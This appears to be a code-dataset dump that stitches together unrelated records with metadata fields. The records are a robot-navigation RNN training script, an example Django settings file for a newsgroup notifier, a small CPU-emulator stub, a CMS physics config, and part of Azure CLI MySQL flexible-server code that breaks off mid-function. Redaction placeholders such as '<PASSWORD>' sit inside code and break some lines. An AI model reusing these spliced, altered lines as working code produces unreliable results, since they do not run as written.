params['filename'] = 'model_trial'
params['mode'] = 'train'
# 'test1': test with colors seen in training; 'test2': swapped colors'; 'test3': new set of colors
# Train ****************************************************************************************************************
warnings.filterwarnings("ignore", category=UserWarning)
robot = Robot.Husky(forward_speed=params['husky_velocity'], dt=params['time_step'])
task = Task.GoalNav(goal=[3.0, 9.0], alpha=0.)
env = Environment.RandomObstacle(robot, parallel=True, gui=False, y_max=params['y_max'], y_min=params['y_min'],
x_min=params['x_min'], x_max=params['x_max'], task=task, mode=params['mode'],
filename=params['filename'])
net = RNN(output_dim, max_m_dim, input_dim, rnn_horizon, seed=seed)
try:
ray.init()
Train.train_AMR_one(env, net, num_epochs, rnn_horizon, horizon, max_m_dim, batch_size, task, lr, reg,
minibatch_size=0, opt_iters=1, multiprocess=True, load=load, filename=load_file, seed=seed,
print_int=print_int, ckpt_int=ckpt_int)
except KeyboardInterrupt:
ray.shutdown()
|
import Robot
import Environment
from Networks import *
import Train
import Task
import ray
import warnings
import torch as pt
# Learning Parameters **************************************************************************************************
num_epochs = 3000
max_m_dim = 300 # at the memory layer
batch_size = 250
input_dim = 1 # actions
output_dim = 17*4 + 1 # observations (RGB-D array size 17 + prev action)
horizon = 80
lr = 1e-4
rnn_horizon = 1 # = horizon if time-varying
reg = 0
load = False
load_file = None # for loading checkpoint models
seed = 42
print_int = 50
ckpt_int = 100
# Simulation Parameters ************************************************************************************************
params = {}
params['time_step'] = 0.1 # seconds
params['husky_velocity'] = 2 # meters per second
# ENVIRONMENT INFORMATION
params['y_max']= 10
params['y_min']= 0
params['x_min']= -5
params['x_max']= 5.5
params['filename'] = 'model_trial'
params['mode'] = 'train'
# 'test1': test with colors seen in training; 'test2': swapped colors'; 'test3': new set of colors
# Train ****************************************************************************************************************
warnings.filterwarnings("ignore", category=UserWarning)
robot = Robot.Husky(forward_speed=params['husky_velocity'], dt=params['time_step'])
task = Task.GoalNav(goal=[3.0, 9.0], alpha=0.)
env = Environment.RandomObstacle(robot, parallel=True, gui=False, y_max=params['y_max'], y_min=params['y_min'],
x_min=params['x_min'], x_max=params['x_max'], task=task, mode=params['mode'],
filename=params['filename'])
net = RNN(output_dim, max_m_dim, input_dim, rnn_horizon, seed=seed)
try:
ray.init()
Train.train_AMR_one(env, net, num_epochs, rnn_horizon, horizon, max_m_dim, batch_size, task, lr, reg,
minibatch_size=0, opt_iters=1, multiprocess=True, load=load, filename=load_file, seed=seed,
print_int=print_int, ckpt_int=ckpt_int)
except KeyboardInterrupt:
ray.shutdown()
|
en
| 0.388389
|
# Learning Parameters ************************************************************************************************** # at the memory layer # actions # observations (RGB-D array size 17 + prev action) # = horizon if time-varying # for loading checkpoint models # Simulation Parameters ************************************************************************************************ # seconds # meters per second # ENVIRONMENT INFORMATION # 'test1': test with colors seen in training; 'test2': swapped colors'; 'test3': new set of colors # Train ****************************************************************************************************************
| 2.263967
| 2
|
ngnotifier/example.settings.py
|
Dubrzr/NG-Notifier
| 14
|
6628120
|
<filename>ngnotifier/example.settings.py
"""
Django settings for ng-notifier project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
"""
import os
from django.conf.global_settings import TEMPLATE_CONTEXT_PROCESSORS as TCP
from django.utils.translation import ugettext_lazy as _
# SITE PARAMETERS
SITE_NAME = "NG Notifier"
DOMAIN = 'http://localhost/' # Must end with a slash! /!\
SITE_URL_PREFIX = '' # Empty or your-prefix/ <- Must end with a slash /!\
SITE_URL = DOMAIN + SITE_URL_PREFIX
SECRET_KEY = ''
API_KEY = '' # Define it if you want to connect with android!
DEBUG = False
TEMPLATE_DEBUG = False
LOGIN_REDIRECT_URL = '/settings'
# DIRECTORIES
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
APP_DIR = os.path.dirname(BASE_DIR)
LOCALE_PATHS = (os.path.join(BASE_DIR, "web", "locale"),)
TEMPLATE_DIRS = (BASE_DIR + '/templates',)
STATIC_ROOT = APP_DIR + '/static/'
STATICFILES_DIRS = (APP_DIR + '/web/static/',)
ALLOWED_HOSTS = ['localhost', '127.0.0.1']
AUTH_USER_MODEL = 'ngnotifier.User'
PASSWORD_HASHERS = ('django.contrib.auth.hashers.PBKDF2PasswordHasher',)
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'ngnotifier',
'captcha',
'apscheduler',
'rest_framework',
'push_notifications',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
}
ROOT_URLCONF = 'ngnotifier.urls'
WSGI_APPLICATION = 'ngnotifier.wsgi.application'
X_FRAME_OPTIONS = 'DENY'
# DATABASE
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
},
# 'default': {
# 'ENGINE': 'django.db.backends.postgresql_psycopg2',
# 'NAME': '',
# 'USER': '',
# 'PASSWORD': '',
# 'HOST': 'localhost',
# 'PORT': 5432
# }
}
# I18N
LANGUAGE_CODE = 'en-en'
TIME_ZONE = 'Europe/Paris'
LANGUAGES = (
('en', _('English')),
)
USE_I18N = False
USE_L10N = True
USE_TZ = False
# STATICS
STATIC_URL = '/' + SITE_URL_PREFIX + 'static/'
# CONTEXT PROCESSORS -> adds some 'global' variables for templates
TEMPLATE_CONTEXT_PROCESSORS = TCP + (
'django.core.context_processors.request',
'ngnotifier.context_processors.site_infos'
)
# **** NOTIFS CONFIG **** #
# Tag to be added to the message object
BOT_TAG = '[BOT]' # Example: News title here [BOT]
# Message to be displayed at the end of the news.
BOT_MSG = '\nThis message has been sent automatically by the *NG NOTIFIER BOT*.'
SEND_FROM_POSTER = False # Send the mail from the address of the news poster
FROM_ADDR = '<EMAIL>'
mail_conf = {
'address': '',
'host': '',
'port': 0,
'user': '',
'pass': '',
'ssl': True
}
PUSH_NOTIFICATIONS_SETTINGS = {
'GCM_API_KEY': '<your api key>', # Google GCM
'APNS_CERTIFICATE': '/path/to/your/certificate.pem', # Apple APNS
'APNS_CERTIFICATE_DEV': '/path/to/yout/certicate_dev.pem',
'APNS_CERTIFICATE_PASSWORD': None,
'APNS_TOPIC': 'org.mygroup.myapp'
}
# **** CELERY CONFIG **** #
SECONDS_DELTA_NEWS = 60 # Time delta between two checks for new news
SECONDS_DELTA_GROUP = 24*60*60 # Time delta between two checks for new groups
# **** HOSTS CONFIG **** #
hosts = {
'news.epita.fr':
{
'host': 'news.epita.fr',
'port': 119,
'user': None,
'pass': None,
'ssl': False,
'encoding': 'utf-8',
'timeout': 30,
'groups': [], # Empty means get all groups
},
}
users = {} # {
# 'Me':
# {
# 'mail': '<EMAIL>',
# 'password': '',
# 'admin': False,
# 'notifs': {
# 'pushbullet': True,
# 'mail': True
# },
# 'pushbullet_api_key': 'somethingherethatisabase64md5',
# 'subscriptions': [
# ]
# },
# }
|
<filename>ngnotifier/example.settings.py
"""
Django settings for ng-notifier project.
For more information on this file, see
https://docs.djangoproject.com/en/1.7/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.7/ref/settings/
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/
"""
import os
from django.conf.global_settings import TEMPLATE_CONTEXT_PROCESSORS as TCP
from django.utils.translation import ugettext_lazy as _
# SITE PARAMETERS
SITE_NAME = "NG Notifier"
DOMAIN = 'http://localhost/' # Must end with a slash! /!\
SITE_URL_PREFIX = '' # Empty or your-prefix/ <- Must end with a slash /!\
SITE_URL = DOMAIN + SITE_URL_PREFIX
SECRET_KEY = ''
API_KEY = '' # Define it if you want to connect with android!
DEBUG = False
TEMPLATE_DEBUG = False
LOGIN_REDIRECT_URL = '/settings'
# DIRECTORIES
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
APP_DIR = os.path.dirname(BASE_DIR)
LOCALE_PATHS = (os.path.join(BASE_DIR, "web", "locale"),)
TEMPLATE_DIRS = (BASE_DIR + '/templates',)
STATIC_ROOT = APP_DIR + '/static/'
STATICFILES_DIRS = (APP_DIR + '/web/static/',)
ALLOWED_HOSTS = ['localhost', '127.0.0.1']
AUTH_USER_MODEL = 'ngnotifier.User'
PASSWORD_HASHERS = ('django.contrib.auth.hashers.PBKDF2PasswordHasher',)
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'ngnotifier',
'captcha',
'apscheduler',
'rest_framework',
'push_notifications',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
CACHES = {
'default': {
'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
}
}
ROOT_URLCONF = 'ngnotifier.urls'
WSGI_APPLICATION = 'ngnotifier.wsgi.application'
X_FRAME_OPTIONS = 'DENY'
# DATABASE
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
},
# 'default': {
# 'ENGINE': 'django.db.backends.postgresql_psycopg2',
# 'NAME': '',
# 'USER': '',
# 'PASSWORD': '',
# 'HOST': 'localhost',
# 'PORT': 5432
# }
}
# I18N
LANGUAGE_CODE = 'en-en'
TIME_ZONE = 'Europe/Paris'
LANGUAGES = (
('en', _('English')),
)
USE_I18N = False
USE_L10N = True
USE_TZ = False
# STATICS
STATIC_URL = '/' + SITE_URL_PREFIX + 'static/'
# CONTEXT PROCESSORS -> adds some 'global' variables for templates
TEMPLATE_CONTEXT_PROCESSORS = TCP + (
'django.core.context_processors.request',
'ngnotifier.context_processors.site_infos'
)
# **** NOTIFS CONFIG **** #
# Tag to be added to the message object
BOT_TAG = '[BOT]' # Example: News title here [BOT]
# Message to be displayed at the end of the news.
BOT_MSG = '\nThis message has been sent automatically by the *NG NOTIFIER BOT*.'
SEND_FROM_POSTER = False # Send the mail from the address of the news poster
FROM_ADDR = '<EMAIL>'
mail_conf = {
'address': '',
'host': '',
'port': 0,
'user': '',
'pass': '',
'ssl': True
}
PUSH_NOTIFICATIONS_SETTINGS = {
'GCM_API_KEY': '<your api key>', # Google GCM
'APNS_CERTIFICATE': '/path/to/your/certificate.pem', # Apple APNS
'APNS_CERTIFICATE_DEV': '/path/to/yout/certicate_dev.pem',
'APNS_CERTIFICATE_PASSWORD': None,
'APNS_TOPIC': 'org.mygroup.myapp'
}
# **** CELERY CONFIG **** #
SECONDS_DELTA_NEWS = 60 # Time delta between two checks for new news
SECONDS_DELTA_GROUP = 24*60*60 # Time delta between two checks for new groups
# **** HOSTS CONFIG **** #
hosts = {
'news.epita.fr':
{
'host': 'news.epita.fr',
'port': 119,
'user': None,
'pass': None,
'ssl': False,
'encoding': 'utf-8',
'timeout': 30,
'groups': [], # Empty means get all groups
},
}
users = {} # {
# 'Me':
# {
# 'mail': '<EMAIL>',
# 'password': '',
# 'admin': False,
# 'notifs': {
# 'pushbullet': True,
# 'mail': True
# },
# 'pushbullet_api_key': 'somethingherethatisabase64md5',
# 'subscriptions': [
# ]
# },
# }
|
en
| 0.527066
|
Django settings for ng-notifier project. For more information on this file, see https://docs.djangoproject.com/en/1.7/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.7/ref/settings/ # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.7/howto/deployment/checklist/ # SITE PARAMETERS # Must end with a slash! /!\ # Empty or your-prefix/ <- Must end with a slash /!\ # Define it if you want to connect with android! # DIRECTORIES # DATABASE # 'default': { # 'ENGINE': 'django.db.backends.postgresql_psycopg2', # 'NAME': '', # 'USER': '', # 'PASSWORD': '', # 'HOST': 'localhost', # 'PORT': 5432 # } # I18N # STATICS # CONTEXT PROCESSORS -> adds some 'global' variables for templates # **** NOTIFS CONFIG **** # # Tag to be added to the message object # Example: News title here [BOT] # Message to be displayed at the end of the news. # Send the mail from the address of the news poster # Google GCM # Apple APNS # **** CELERY CONFIG **** # # Time delta between two checks for new news # Time delta between two checks for new groups # **** HOSTS CONFIG **** # # Empty means get all groups # { # 'Me': # { # 'mail': '<EMAIL>', # 'password': '', # 'admin': False, # 'notifs': { # 'pushbullet': True, # 'mail': True # }, # 'pushbullet_api_key': 'somethingherethatisabase64md5', # 'subscriptions': [ # ] # }, # }
| 1.790553
| 2
|
py64/memory.py
|
jesseward/py64
| 5
|
6628121
|
<reponame>jesseward/py64
#!/usr/bin/env python2
# I, <NAME>, hereby place this file into the public domain.
class Memory(object):
def __init__(self):
self.B_can_write = True # in the instance because of ShedSkin
# def read_memory(self, address, size = 1):
# return 0xFF
#
# def write_memory(self, address, value, size):
# pass
|
#!/usr/bin/env python2
# I, <NAME>, hereby place this file into the public domain.
class Memory(object):
def __init__(self):
self.B_can_write = True # in the instance because of ShedSkin
# def read_memory(self, address, size = 1):
# return 0xFF
#
# def write_memory(self, address, value, size):
# pass
|
en
| 0.718702
|
#!/usr/bin/env python2 # I, <NAME>, hereby place this file into the public domain. # in the instance because of ShedSkin # def read_memory(self, address, size = 1): # return 0xFF # # def write_memory(self, address, value, size): # pass
| 2.711086
| 3
|
python/UnfoldingProducer_cfi.py
|
jjacob/NTupleProduction
| 1
|
6628122
|
import FWCore.ParameterSet.Config as cms
unfoldingProducerElectron = cms.EDProducer("UnfoldingProducer",
pu_weight_input=cms.InputTag('eventWeightPU'),
b_tag_weight_input=cms.InputTag('eventWeightBtag'),
storePDFWeights=cms.bool(True),
PDFWeightsInputTag=cms.InputTag('pdfWeights','cteq66'),
leptonWeightsInputTag=cms.InputTag('eventWeightMuons'),
gen_part_input=cms.InputTag('genParticles'),
gen_MET_input=cms.InputTag('genMetTrue'),
reco_MET_Input=cms.InputTag('patType1CorrectedPFMet'),
gen_jet_input=cms.InputTag('ak5GenJetsNoNu'),
reco_jet_input=cms.InputTag('selectedPatJetsPFlow'),
electron_input=cms.InputTag("topPairEPlusJetsSelection", 'TopPairElectronPlusJetsSelection.signalElectron', 'PAT'),
muon_input=cms.InputTag("topPairMuPlusJetsSelection", 'TopPairMuonPlusJetsSelection.signalMuon', 'PAT'),
electronIndex_input=cms.InputTag("topPairEPlusJetsSelection", 'TopPairElectronPlusJetsSelection.signalElectronIndex', 'PAT'),
muonIndex_input=cms.InputTag("topPairMuPlusJetsSelection", 'TopPairMuonPlusJetsSelection.signalMuonIndex', 'PAT'),
vertex_input=cms.InputTag('goodOfflinePrimaryVertices'),
gen_event_input=cms.InputTag('genEvt'),
selection_flag_input=cms.InputTag("topPairEPlusJetsSelection", 'TopPairElectronPlusJetsSelection.FullSelection', 'PAT'),
is_semileptonic_electron_flag=cms.InputTag('ttSemiLeptonicElectronFilter'),
is_semileptonic_muon_flag=cms.InputTag('ttSemiLeptonicMuonFilter'),
do_electron_channel=cms.untracked.bool(True),
Prefix = cms.string('unfolding.'),
Suffix = cms.string(''),
)
unfoldingProducerMuon = unfoldingProducerElectron.clone(
do_electron_channel=cms.untracked.bool(False),
)
|
import FWCore.ParameterSet.Config as cms
unfoldingProducerElectron = cms.EDProducer("UnfoldingProducer",
pu_weight_input=cms.InputTag('eventWeightPU'),
b_tag_weight_input=cms.InputTag('eventWeightBtag'),
storePDFWeights=cms.bool(True),
PDFWeightsInputTag=cms.InputTag('pdfWeights','cteq66'),
leptonWeightsInputTag=cms.InputTag('eventWeightMuons'),
gen_part_input=cms.InputTag('genParticles'),
gen_MET_input=cms.InputTag('genMetTrue'),
reco_MET_Input=cms.InputTag('patType1CorrectedPFMet'),
gen_jet_input=cms.InputTag('ak5GenJetsNoNu'),
reco_jet_input=cms.InputTag('selectedPatJetsPFlow'),
electron_input=cms.InputTag("topPairEPlusJetsSelection", 'TopPairElectronPlusJetsSelection.signalElectron', 'PAT'),
muon_input=cms.InputTag("topPairMuPlusJetsSelection", 'TopPairMuonPlusJetsSelection.signalMuon', 'PAT'),
electronIndex_input=cms.InputTag("topPairEPlusJetsSelection", 'TopPairElectronPlusJetsSelection.signalElectronIndex', 'PAT'),
muonIndex_input=cms.InputTag("topPairMuPlusJetsSelection", 'TopPairMuonPlusJetsSelection.signalMuonIndex', 'PAT'),
vertex_input=cms.InputTag('goodOfflinePrimaryVertices'),
gen_event_input=cms.InputTag('genEvt'),
selection_flag_input=cms.InputTag("topPairEPlusJetsSelection", 'TopPairElectronPlusJetsSelection.FullSelection', 'PAT'),
is_semileptonic_electron_flag=cms.InputTag('ttSemiLeptonicElectronFilter'),
is_semileptonic_muon_flag=cms.InputTag('ttSemiLeptonicMuonFilter'),
do_electron_channel=cms.untracked.bool(True),
Prefix = cms.string('unfolding.'),
Suffix = cms.string(''),
)
unfoldingProducerMuon = unfoldingProducerElectron.clone(
do_electron_channel=cms.untracked.bool(False),
)
|
none
| 1
| 1.294216
| 1
|
|
src/azure-cli/azure/cli/command_modules/rdbms/flexible_server_custom_mysql.py
|
rheaparekh/azure-cli
| 1
|
6628123
|
<filename>src/azure-cli/azure/cli/command_modules/rdbms/flexible_server_custom_mysql.py
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=unused-argument, line-too-long
import datetime as dt
from datetime import datetime
from msrestazure.azure_exceptions import CloudError
from msrestazure.tools import resource_id, is_valid_resource_id, parse_resource_id # pylint: disable=import-error
from knack.log import get_logger
from azure.core.exceptions import ResourceNotFoundError
from azure.cli.core.azclierror import RequiredArgumentMissingError
from azure.cli.core.commands.client_factory import get_subscription_id
from azure.cli.core.util import CLIError, sdk_no_wait
from azure.cli.core.local_context import ALL
from azure.mgmt.rdbms import mysql_flexibleservers
from ._client_factory import get_mysql_flexible_management_client, cf_mysql_flexible_firewall_rules, \
cf_mysql_flexible_db
from ._flexible_server_util import resolve_poller, generate_missing_parameters, create_firewall_rule, \
parse_public_access_input, generate_password, parse_maintenance_window, get_mysql_list_skus_info, \
DEFAULT_LOCATION_MySQL
from .flexible_server_custom_common import user_confirmation
from .flexible_server_virtual_network import create_vnet, prepare_vnet
from .validators import mysql_arguments_validator
logger = get_logger(__name__)
DEFAULT_DB_NAME = 'flexibleserverdb'
DELEGATION_SERVICE_NAME = "Microsoft.DBforMySQL/flexibleServers"
# region create without args
# pylint: disable=too-many-locals, too-many-statements
def flexible_server_create(cmd, client, resource_group_name=None, server_name=None, sku_name=None, tier=None,
location=None, storage_mb=None, administrator_login=None,
administrator_login_password=<PASSWORD>, version=None,
backup_retention=None, tags=None, public_access=None, database_name=None,
subnet_arm_resource_id=None, high_availability=None, zone=None, assign_identity=False,
vnet_resource_id=None, vnet_address_prefix=None, subnet_address_prefix=None, iops=None):
# validator
if location is None:
location = DEFAULT_LOCATION_MySQL
sku_info, iops_info = get_mysql_list_skus_info(cmd, location)
mysql_arguments_validator(tier, sku_name, storage_mb, backup_retention, sku_info, version=version)
db_context = DbContext(
azure_sdk=mysql_flexibleservers, cf_firewall=cf_mysql_flexible_firewall_rules, cf_db=cf_mysql_flexible_db,
logging_name='MySQL', command_group='mysql', server_client=client)
# Raise error when user passes values for both parameters
if subnet_arm_resource_id is not None and public_access is not None:
raise CLIError("Incorrect usage : A combination of the parameters --subnet "
"and --public_access is invalid. Use either one of them.")
# When address space parameters are passed, the only valid combination is : --vnet, --subnet, --vnet-address-prefix, --subnet-address-prefix
# pylint: disable=too-many-boolean-expressions
if (vnet_address_prefix is not None) or (subnet_address_prefix is not None):
if (((vnet_address_prefix is not None) and (subnet_address_prefix is None)) or
((vnet_address_prefix is None) and (subnet_address_prefix is not None)) or
((vnet_address_prefix is not None) and (subnet_address_prefix is not None) and
((vnet_resource_id is None) or (subnet_arm_resource_id is None)))):
raise CLIError("Incorrect usage : "
"--vnet, --subnet, --vnet-address-prefix, --subnet-address-prefix must be supplied together.")
server_result = firewall_id = subnet_id = None
# Populate desired parameters
location, resource_group_name, server_name = generate_missing_parameters(cmd, location, resource_group_name,
server_name, 'mysql')
server_name = server_name.lower()
# Handle Vnet scenario
if (subnet_arm_resource_id is not None) or (vnet_resource_id is not None):
subnet_id = prepare_vnet(cmd, server_name, vnet_resource_id, subnet_arm_resource_id, resource_group_name,
location, DELEGATION_SERVICE_NAME, vnet_address_prefix, subnet_address_prefix)
delegated_subnet_arguments = mysql_flexibleservers.models.DelegatedSubnetArguments(
subnet_arm_resource_id=subnet_id)
elif public_access is None and subnet_arm_resource_id is None and vnet_resource_id is None:
subnet_id = create_vnet(cmd, server_name, location, resource_group_name,
DELEGATION_SERVICE_NAME)
delegated_subnet_arguments = mysql_flexibleservers.models.DelegatedSubnetArguments(
subnet_arm_resource_id=subnet_id)
else:
delegated_subnet_arguments = None
# calculate IOPS
iops = _determine_iops(storage_mb, iops_info, iops, tier, sku_name)
storage_mb *= 1024 # storage input comes in GiB value
administrator_login_password = <PASSWORD>(administrator_login_password)
if server_result is None:
# Create mysql server
# Note : passing public_access has no effect as the accepted values are 'Enabled' and 'Disabled'. So the value ends up being ignored.
server_result = _create_server(db_context, cmd, resource_group_name, server_name, location,
backup_retention,
sku_name, tier, storage_mb, administrator_login,
administrator_login_password,
version, tags, delegated_subnet_arguments, assign_identity, public_access,
high_availability, zone, iops)
# Adding firewall rule
if public_access is not None and str(public_access).lower() != 'none':
if str(public_access).lower() == 'all':
start_ip, end_ip = '0.0.0.0', '255.255.255.255'
else:
start_ip, end_ip = parse_public_access_input(public_access)
firewall_id = create_firewall_rule(db_context, cmd, resource_group_name, server_name, start_ip, end_ip)
# Create mysql database if it does not exist
if database_name is None:
database_name = DEFAULT_DB_NAME
_create_database(db_context, cmd, resource_group_name, server_name, database_name)
user = server_result.administrator_login
server_id = server_result.id
loc = server_result.location
version = server_result.version
sku = server_result.sku.name
host = server_result.fully_qualified_domain_name
logger.warning('Make a note of your password. If you forget, you would have to reset your password with'
'\'az mysql flexible-server update -n %s -g %s -p <new-password>\'.',
server_name, resource_group_name)
_update_local_contexts(cmd, server_name, resource_group_name, location, user)
return _form_response(user, sku, loc, server_id, host, version,
administrator_login_password if administrator_login_password is not None else '*****',
_create_mysql_connection_string(host, database_name, user, administrator_login_password),
database_name, firewall_id, subnet_id)
def flexible_server_restore(cmd, client, resource_group_name, server_name, source_server, restore_point_in_time, location=None, no_wait=False):
provider = 'Microsoft.DBforMySQL'
if not is_valid_resource_id(source_server):
if len(source_server.split('/')) == 1:
source_server = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
namespace=provider,
type='flexibleServers',
name=source_server)
else:
raise ValueError('The provided source-server {} is invalid.'.format(source_server))
try:
restore_point_in_time = datetime.strptime(restore_point_in_time, "%Y-%m-%dT%H:%M:%S.%f+00:00")
except ValueError:
restore_point_in_time = datetime.strptime(restore_point_in_time, "%Y-%m-%dT%H:%M:%S+00:00")
restore_point_in_time = restore_point_in_time.replace(tzinfo=dt.timezone.utc)
parameters = mysql_flexibleservers.models.Server(
source_server_id=source_server,
restore_point_in_time=restore_point_in_time,
location=location,
create_mode="PointInTimeRestore"
)
# Retrieve location from same location as source server
id_parts = parse_resource_id(source_server)
try:
source_server_object = client.get(id_parts['resource_group'], id_parts['name'])
parameters.location = source_server_object.location
except Exception as e:
raise ValueError('Unable to get source server: {}.'.format(str(e)))
return sdk_no_wait(no_wait, client.begin_create, resource_group_name, server_name, parameters)
# pylint: disable=too-many-branches
def flexible_server_update_custom_func(cmd, instance,
sku_name=None,
tier=None,
storage_mb=None,
backup_retention=None,
administrator_login_password=<PASSWORD>,
ssl_enforcement=None,
subnet_arm_resource_id=None,
tags=None,
auto_grow=None,
assign_identity=False,
ha_enabled=None,
replication_role=None,
maintenance_window=None,
iops=None):
# validator
location = ''.join(instance.location.lower().split())
sku_info, iops_info = get_mysql_list_skus_info(cmd, location)
mysql_arguments_validator(tier, sku_name, storage_mb, backup_retention, sku_info, instance=instance)
from importlib import import_module
server_module_path = instance.__module__
module = import_module(server_module_path) # replacement not needed for update in flex servers
ServerForUpdate = getattr(module, 'ServerForUpdate')
if storage_mb:
instance.storage_profile.storage_mb = storage_mb * 1024
sku_rank = {'Standard_B1s': 1, 'Standard_B1ms': 2, 'Standard_B2s': 3, 'Standard_D2ds_v4': 4,
'Standard_D4ds_v4': 5, 'Standard_D8ds_v4': 6,
'Standard_D16ds_v4': 7, 'Standard_D32ds_v4': 8, 'Standard_D48ds_v4': 9, 'Standard_D64ds_v4': 10,
'Standard_E2ds_v4': 11,
'Standard_E4ds_v4': 12, 'Standard_E8ds_v4': 13, 'Standard_E16ds_v4': 14, 'Standard_E32ds_v4': 15,
'Standard_E48ds_v4': 16,
'Standard_E64ds_v4': 17}
if location == 'eastus2euap':
sku_rank.update({
'Standard_D2s_v3': 4,
'Standard_D4s_v3': 5, 'Standard_D8s_v3': 6,
'Standard_D16s_v3': 7, 'Standard_D32s_v3': 8, 'Standard_D48s_v3': 9, 'Standard_D64s_v3': 10,
'Standard_E2s_v3': 11,
'Standard_E4s_v3': 12, 'Standard_E8s_v3': 13, 'Standard_E16s_v3': 14, 'Standard_E32s_v3': 15,
'Standard_E48s_v3': 16,
'Standard_E64s_v3': 17
})
if iops:
if (tier is not None and sku_name is None) or (tier is None and sku_name is not None):
raise CLIError('Argument Error. If you pass --tier, --sku_name is a mandatory parameter and vice-versa.')
if tier is None and sku_name is None:
iops = _determine_iops(instance.storage_profile.storage_mb // 1024, iops_info, iops, instance.sku.tier, instance.sku.name)
else:
new_sku_rank = sku_rank[sku_name]
old_sku_rank = sku_rank[instance.sku.name]
supplied_iops = iops
max_allowed_iops_new_sku = iops_info[tier][sku_name]
default_iops = 100
free_iops = (instance.storage_profile.storage_mb // 1024) * 3
# Downgrading SKU
if new_sku_rank < old_sku_rank:
if supplied_iops > max_allowed_iops_new_sku:
iops = max_allowed_iops_new_sku
logger.warning('The max IOPS for your sku is %s. Provisioning the server with %s...', iops, iops)
elif supplied_iops < default_iops:
if free_iops < default_iops:
iops = default_iops
logger.warning('The min IOPS is %s. Provisioning the server with %s...', default_iops,
default_iops)
else:
iops = min(max_allowed_iops_new_sku, free_iops)
logger.warning('Updating the server with %s free IOPS...', iops)
else: # Upgrading SKU
if supplied_iops > max_allowed_iops_new_sku:
iops = max_allowed_iops_new_sku
logger.warning(
'The max IOPS for your sku is %s. Provisioning the server with %s...', iops, iops)
elif supplied_iops <= max_allowed_iops_new_sku:
iops = max(supplied_iops, min(free_iops, max_allowed_iops_new_sku))
if iops != supplied_iops:
logger.warning('Updating the server with %s free IOPS...', iops)
elif supplied_iops < default_iops:
if free_iops < default_iops:
iops = default_iops
logger.warning(
'The min IOPS is %s. Updating the server with %s...', default_iops, default_iops)
else:
iops = min(max_allowed_iops_new_sku, free_iops)
logger.warning('Updating the server with %s free IOPS...', iops)
instance.sku.name = sku_name
instance.sku.tier = tier
instance.storage_profile.storage_iops = iops
# pylint: disable=too-many-boolean-expressions
if (iops is None and tier is None and sku_name) or (iops is None and sku_name is None and tier):
raise CLIError('Argument Error. If you pass --tier, --sku_name is a mandatory parameter and vice-versa.')
if iops is None and sku_name and tier:
new_sku_rank = sku_rank[sku_name]
old_sku_rank = sku_rank[instance.sku.name]
instance.sku.name = sku_name
instance.sku.tier = tier
max_allowed_iops_new_sku = iops_info[tier][sku_name]
iops = instance.storage_profile.storage_iops
if new_sku_rank < old_sku_rank: # Downgrading
if instance.storage_profile.storage_iops > max_allowed_iops_new_sku:
iops = max_allowed_iops_new_sku
logger.warning('Updating the server with max %s IOPS...', iops)
else: # Upgrading
if instance.storage_profile.storage_iops < (instance.storage_profile.storage_mb // 1024) * 3:
iops = min(max_allowed_iops_new_sku, (instance.storage_profile.storage_mb // 1024) * 3)
logger.warning('Updating the server with free %s IOPS...', iops)
instance.storage_profile.storage_iops = iops
if backup_retention:
instance.storage_profile.backup_retention_days = backup_retention
if auto_grow:
instance.storage_profile.storage_autogrow = auto_grow
if subnet_arm_resource_id:
instance.delegated_subnet_arguments.subnet_arm_resource_id = subnet_arm_resource_id
if maintenance_window:
logger.warning('If you are updating maintenancw window with other parameter, maintenance window will be updated first. Please update the other parameters later.')
# if disabled is pass in reset to default values
if maintenance_window.lower() == "disabled":
day_of_week = start_hour = start_minute = 0
custom_window = "Disabled"
else:
day_of_week, start_hour, start_minute = parse_maintenance_window(maintenance_window)
custom_window = "Enabled"
# set values - if maintenance_window when is None when created then create a new object
if instance.maintenance_window is None:
instance.maintenance_window = mysql_flexibleservers.models.MaintenanceWindow(
day_of_week=day_of_week,
start_hour=start_hour,
start_minute=start_minute,
custom_window=custom_window
)
else:
